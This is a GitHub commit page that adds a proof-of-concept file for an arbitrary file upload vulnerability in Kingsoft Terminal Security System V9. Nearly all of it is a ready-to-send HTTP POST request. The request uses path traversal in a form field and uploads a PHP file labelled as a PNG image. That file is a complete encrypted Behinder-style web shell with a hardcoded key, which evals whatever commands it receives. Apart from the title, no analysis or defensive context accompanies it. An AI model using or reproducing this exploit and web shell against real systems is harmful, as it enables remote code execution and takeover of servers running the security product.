admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 金山终端安全系统V9任意文件上传漏洞.md

Browse Source
This commit is contained in:
wy876 2023-08-19 20:43:28 +08:00 committed by GitHub
parent 6cc2e7e604
commit 9c4b8b43db
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 38 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
金山终端安全系统V9任意文件上传漏洞.md Normal file
View File

@ -0,0 +1,38 @@
## 金山终端安全系统V9任意文件上传漏洞
```
POST /inter/software_relation.php HTTP/1.1
Host: 192.168.249.137:6868
Content-Length: 1557
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://192.168.249.137:6868
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxRP5VjBKdqBrCixM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close ------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolFileName" ../../datav.php
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolDescri"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="version"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="sofe_typeof"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="fileSize"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="param"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolName"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolImage"; filename="3.php" Content-Type: image/png
<?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?>
------WebKitFormBoundaryxRP5VjBKdqBrCixM
```